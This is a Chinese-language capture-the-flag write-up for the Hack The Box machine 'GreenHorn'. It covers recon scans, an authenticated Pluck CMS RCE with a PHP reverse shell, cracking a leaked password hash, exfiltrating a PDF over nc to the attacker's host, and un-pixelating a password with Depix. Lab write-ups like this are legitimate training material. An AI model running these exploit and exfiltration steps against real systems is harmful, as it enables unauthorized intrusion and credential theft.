HTB-GreenHorn

admin 2024年8月25日00:55:19评论11 views字数 1532阅读5分6秒阅读模式

信息收集:

nmap --top-ports 10000 -T4 10.10.11.25 -Pnnmap -p22,80,3000 -sTVC 10.10.11.25 

HTB-GreenHorn

扫着目录

gobuster dir -u "http://greenhorn.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --exclude-length 0

看Web:

HTB-GreenHorn

HTB-GreenHorn

介绍+欢迎新员工,套话,没什么信息,有个登录页面:

HTB-GreenHorn

CMS是pluck,搜索是有RCE漏洞的:

HTB-GreenHorn

# 直接使用searchsploit 拉下来的 poyload 不好看searchsploit pluck -m php/webapps/51592.py

使用github中的POC,链接:https://github.com/Rai2en/CVE-2023-50564_Pluck-v4.7.18_PoC

把POC仓库拉下来,修改poc.py中的目标url地址:

HTB-GreenHorn

使用 https://github.com/pentestmonkey/php-reverse-shell 创建php反弹shell,然后压缩到payload.zip中:

zip -r payload.zip shell.php

执行POC,看输出木马是传上去了,但是没找到上传后的路径:

HTB-GreenHorn

挂上代理看下怎么回事:

HTB-GreenHorn

HTB-GreenHorn

HTB-GreenHorn

の我并不了解这个漏洞,但是我看应该是翻车了。这个漏洞不是未授权RCE吗?怎么上传还显示登录未成功??、

额,翻了一圈发现这个是需要授权的,刚那个POC误我……

HTB-GreenHorn

这得找登录密码了,但是刚web没扫出来什么敏感目录,爆破密码应该不是这个靶机想要的。

刚扫除的3000端口是个git托管服务,还存储着web服务代码(这个场景是不是似曾相识,之前的HTB-Compiled 打点篇遇到过)

HTB-GreenHorn

克隆下来,找敏感信息:

# 寻找密码关键字grep -r -e "pass" -e "password" . | grep "="

登录时的密码校验逻辑是和ww进行比较,硬编码?

HTB-GreenHorn

找到了硬编码的密码:

HTB-GreenHorn

识别类型为 sha512 的:

HTB-GreenHorn

使用john解出来密码是我中意你:

HTB-GreenHorn

然后把密码填到刚才的poc脚本里,本以为这下应该没问题了,但是显示登录次数过多,5分钟后再试,哪个哥哥在爆破?这么暴力吗?

HTB-GreenHorn

等了5分钟,弹过来shell:

HTB-GreenHorn

在 /home/junior 目录找到了user flag,但是无权读。使用python优化下shell的交互,原来的太难受了:

python3 -c 'import pty;pty.spawn("/bin/bash")export TERM=xterm-256color

查找特权文件:

find / -type f -user junior 2>/dev/null

HTB-GreenHorn

原来3000端口的git服务就是junior用户起的,使用git中泄露的密码可切换到junior用户,读到flag,有点鸡肋。

这个靶机的提权更鸡肋,竟然是去马赛克~

junior用户目录下面显眼的pdf文件down下来,可以使用python起web服务,也可是使用nc等:

靶机:nc 10.10.14.32 8088 < 'Open OpenVAS.pdf'主机:nc -lvp 8088 > 'OpenVAS.pdf'

打开pdf文件发现打上马赛克的密码:

HTB-GreenHorn

接下来是去除马赛克。先下载pdfimages,用来从pdf中提取内嵌图片:

sudo apt install poppler-utilspdfimages ./OpenVAS.pdf extrated-images

得到像素化图片:

HTB-GreenHorn

使用 Depix 工具从像素化图片中提取文字:

HTB-GreenHorn

获取密码,结束:

HTB-GreenHorn

原文始发于微信公众号(KeepHack1ng):HTB-GreenHorn

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月25日00:55:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-GreenHornhttp://cn-sec.com/archives/3093030.html

发表评论

匿名网友 填写信息